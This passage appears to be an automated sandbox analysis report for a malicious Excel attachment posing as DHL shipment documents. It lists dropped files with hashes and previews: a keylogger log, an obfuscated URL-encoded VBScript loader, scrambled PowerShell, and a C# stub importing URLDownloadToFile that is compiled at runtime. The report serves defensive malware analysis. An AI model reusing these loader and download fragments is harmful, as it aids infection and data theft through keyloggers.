                                                                                                                                            Preview:....[.2.0.2.4./.1.0./.0.4. .0.5.:.5.6.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.h.t.t.p.s.:././.s.t.y.l.i.t.e...i.o./.n.o.D.e.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .D.H.L. .S.h.i.p.m.e.n.t. .D.o.c.'.s. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].....[.C.t.r.l.L.].....[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15189
                                                                                                                                            Entropy (8bit):5.0343247648743
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                                                                            MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                                                                            SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                                                                            SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                                                                            SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):120055
                                                                                                                                            Entropy (8bit):2.5496121571265027
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:7oa+apd7Ah23jxDOs+XwD3Os+XN5npDFuNsCW4inkHM99DdG+DBMs4rI3mXOs+Ut:Ea+M7Rv778LFL4eftDg5c8dJyAM9AT
                                                                                                                                            MD5:ACD8D701BB47046031E3F629D7DD5253
                                                                                                                                            SHA1:A2DABAD5752B7EECB60DFEBEFF8B5DD15F5DBB23
                                                                                                                                            SHA-256:AABB36DAAE24A2DAE5B297A82E27183C1C0E1B33E489A2905CCC3EBBF7815A25
                                                                                                                                            SHA-512:B707229060DAFF93AFA5C294D83A74C123DF4381836D4367FD81849CB2B75529206C42CB29A93BFAC5F173202D0BDA99E39F2C8462DACA728B7D5360884553A5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCrIPT%252520TYPe%25253D%252522TeXT/vBsCRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):334132
                                                                                                                                            Entropy (8bit):3.7592756836457886
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:8gT5umy/FrPBBBU4W3hFUFYc1QvkhaUQCy37Gf2UjmkNcGV5jc2hUmwQ86Yk+GmF:8y5ErvBbW3hFUz1QK/Q537ehmkfV5jcB
                                                                                                                                            MD5:FE2617881E5B8181D922E6E19C80942D
                                                                                                                                            SHA1:3B29BE7A03B6CB86626888612BB9396C9ADD116B
                                                                                                                                            SHA-256:93B7AFFF3379C6A5421398F5EC92ABF1349B740F54FB5B610DA332C22110246A
                                                                                                                                            SHA-512:5C5799F996915DCC8D31C6120FE042B2FB8B7052F3E12904384EB51DADC483353EF84D2D8DF4C2E6BC06B1A1DA4C5B11EB718B16D31A965284531563F27A8040
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..d.W.W.O.C.i.f.x.W.W.c.W.k.a.f.f.e.q.i.t.g.u.f.Z.W.R.G.e.a.G.p.O.L.L.i.l.G.R.C.d. .=. .".u.i.S.O.e.f.G.b.a.W.H.q.u.e.c.f.k.C.N.U.c.L.o.P.K.z.i.G.H.A.e.L.L.P.i.e.C.Z.H.i.v.".....f.c.s.j.L.a.A.i.o.L.o.K.z.G.h.K.W.L.G.c.L.m.c.f.f.f.N.G.L.p.I.R.Z.i.a.W.k.N.i.i. .=. .".i.m.p.i.L.W.W.x.H.G.N.c.R.K.L.C.h.c.G.r.L.K.u.G.a.U.G.B.K.r.k.U.G.n.k.e.W.N.e.G.".....W.u.n.L.H.x.U.f.c.W.v.p.W.G.m.h.d.W.h.b.L.W.o.Z.f.p.o.v.b.i.T.r.i.L.N.i.L.c.x.s. .=. .".f.u.o.W.Q.P.m.W.T.l.u.c.W.v.Z.G.c.h.i.k.P.C.K.q.K.S.c.W.z.U.K.e.W.x.z.U.L.L.W.t.".....B.c.d.Z.A.C.L.L.P.W.I.W.L.K.K.U.J.K.B.i.L.m.L.L.p.A.W.W.K.e.k.q.f.o.W.A.O.U.s.U. .=. .".b.o.f.L.T.I.e.N.i.W.L.h.k.t.h.e.L.U.W.k.P.l.n.k.j.B.p.q.L.A.J.W.O.U.C.q.N.b.z.P.".....b.U.N.C.L.v.B.G.h.h.K.f.e.d.W.e.G.r.i.W.W.o.x.P.U.J.u.R.P.G.i.e.W.b.d.N.z.W.L.N. .=. .".U.i.q.A.o.f.L.W.Z.e.k.c.z.h.r.P.C.W.f.f.P.u.L.r.L.h.L.L.u.z.k.k.p.o.R.A.z.U.O.L.".....Q.T.l.a.W.W.z.N.K.g.d.t.K.K.L.i.W.O.n.n.K.U.W.Z.a.U.R.H.T.B.k.s.L.W.N.U.m.i.L.W. .=. .".L.K.b.i.l.b.i.W.k.c.I.u.i.G.P.p.o.r.q.
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):962
                                                                                                                                            Entropy (8bit):5.012309356796613
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                            MD5:14B479958E659C5A4480548A393022AC
                                                                                                                                            SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                                                                                                                                            SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                                                                                                                                            SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2342852
                                                                                                                                            Entropy (8bit):2.6417290025884554
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                            MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                            SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                            SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                            SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8084
                                                                                                                                            Entropy (8bit):2.570503528684488
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
                                                                                                                                            MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
                                                                                                                                            SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
                                                                                                                                            SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
                                                                                                                                            SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):76472
                                                                                                                                            Entropy (8bit):3.025081600163608
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
                                                                                                                                            MD5:A4B79FF3D7725F69AB98C49A72805D64
                                                                                                                                            SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
                                                                                                                                            SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
                                                                                                                                            SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2342852
                                                                                                                                            Entropy (8bit):2.6417290025884554
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                            MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                            SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                            SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                            SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):884312
                                                                                                                                            Entropy (8bit):1.2944965349348616
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                                                                                                            MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                                                                                                            SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                                                                                                            SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                                                                                                            SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38272
                                                                                                                                            Entropy (8bit):2.8200425031385645
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
                                                                                                                                            MD5:C898CDC91D0BD5EFB41E576B8A19E931
                                                                                                                                            SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
                                                                                                                                            SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
                                                                                                                                            SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):494
                                                                                                                                            Entropy (8bit):3.957311526298906
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:V/DsYLDS81zu9jtauVMOnQXReKJ8SRHy4H1pr9Qm+SFij/KHHQy:V/DTLDfui+QXfHfr2uWyQy
                                                                                                                                            MD5:E39F9C6D0BDBC159574188842BE55EAE
                                                                                                                                            SHA1:3BF4AAAC9AB701A13A4C109B951A5F2204718AAC
                                                                                                                                            SHA-256:13E12E3E05D1B0210A7FB99E152A4AA0F298F9B764B016669F7DBC2933F8DDDE
                                                                                                                                            SHA-512:FE73CD3B52090C31978F4EA643682FAE645E224C2C1839BEA513A6AB9C369D4CD4C39D9C12BC21D2B6BF5AF99D65E39BC8AB3D5F2297CF2B3ED3B094FC93074B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace OXMygYLEYqv.{. public class hmfXhOXgMWY. {. [DllImport("URLMoN.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr bzcwtLNw,string fwjV,string flWcDs,uint DxFWbnW,IntPtr tCjbMzExQB);.. }..}.
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):369
                                                                                                                                            Entropy (8bit):5.208495217038105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fkLi1JJ0zxs7+AEszIP23fkLi/H:p37Lvkmb6KzcLiqWZEocLi/H
                                                                                                                                            MD5:81B96130BD34E54AE12579253FFD28A6
                                                                                                                                            SHA1:54544B29720278FD3AA46DFB7D79E42FAF9A66CF
                                                                                                                                            SHA-256:352F0901C82852FD74CAD9F2D5BE09C878EF43519F3AD42E369EBD57C08B2026
                                                                                                                                            SHA-512:0016EB18583C6E7F7183F52E3D1B264251DCDFAA19D5CFB3D43090C42512B21A54A675102B02661BB3DB201BBE94A23810CCBF22807A89556205CD3E8314C432
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.0.cs"
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3072
                                                                                                                                            Entropy (8bit):2.8858873965469405
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:etGSDhepuYYNdl8mJlykmNL8GytkZffJLtFWI+ycuZhNSoakSl9PNnq:6VtY4+mJle8G1JfJLm1ul5a3Fq
                                                                                                                                            MD5:FD5E47B988762DE16D86BA5A876E5A12
                                                                                                                                            SHA1:7ADB422437454A24981D0FA87210023961EE6F46
                                                                                                                                            SHA-256:59722524979952CC9B3D928300C6E809B0DA189D6B54611E6CAA57AE21B88336
                                                                                                                                            SHA-512:0558D5E1DDA8D8893145E4BA1A41C3D8DF5CE6A1F4E60B7126FD28ABF9821565FBDEC428924C8D15C77253999627192AB784B930D5A4A8624E6849EDE2F3748D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................#... ...@....... ....................................@.................................l#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................?.8.......................................#.............. F.....P ......X.........^.....g.....l.....s.....{...X.....X...!.X.....X.......!.....*.......F......................................./..........<Module>.00
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):866
                                                                                                                                            Entropy (8bit):5.320105067030905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:AId3ka6KzXEoaKaMD5DqBVKVrdFAMBJTH:Akka60XEoaKdDcVKdBJj
                                                                                                                                            MD5:ABA525EB21F1D56DA2516DF48E7A0097
                                                                                                                                            SHA1:7788A1C53B321A6ED353F8CC8448133A00B40033
                                                                                                                                            SHA-256:4EBABC5FEE454EB2EFFBE36D05F34D21A7CAFF9C8739333BB7702141313B16E2
                                                                                                                                            SHA-512:FC8D4EC5B5693FF134587ED821E88F9E25374A147E34D8111CA6A7E0A9F809B14E8F7E672255D71140360A2E82898BEB78B61D1016AE4BC8BC1ACCC1AA6370A4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            File Type:MSVC .res
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):652
                                                                                                                                            Entropy (8bit):3.077942713253658
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUoak7Ynqql9PN5Dlq5J:+RI+ycuZhNSoakSl9PNnqX
                                                                                                                                            MD5:CD0D9C72C9CF44AD8ACE832F145847A3
                                                                                                                                            SHA1:15B8E6364196DDFA315FAD22A24DF5706FD81D70
                                                                                                                                            SHA-256:D6B004C145A80206606BEDB149CEE81DBE0EE34058EE8568C3FD31BD95037C32
                                                                                                                                            SHA-512:972C2C016EC04C4AFD02777C6EDD8570FFAD936AFEF6437AAEA2EF68EA886A87C3FBCEB4081D344965F415BE37E551BA208A11FD308A99BEAD8B65A4CD341C4E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.0.k.p.p.f.a.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.0.k.p.p.f.a.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
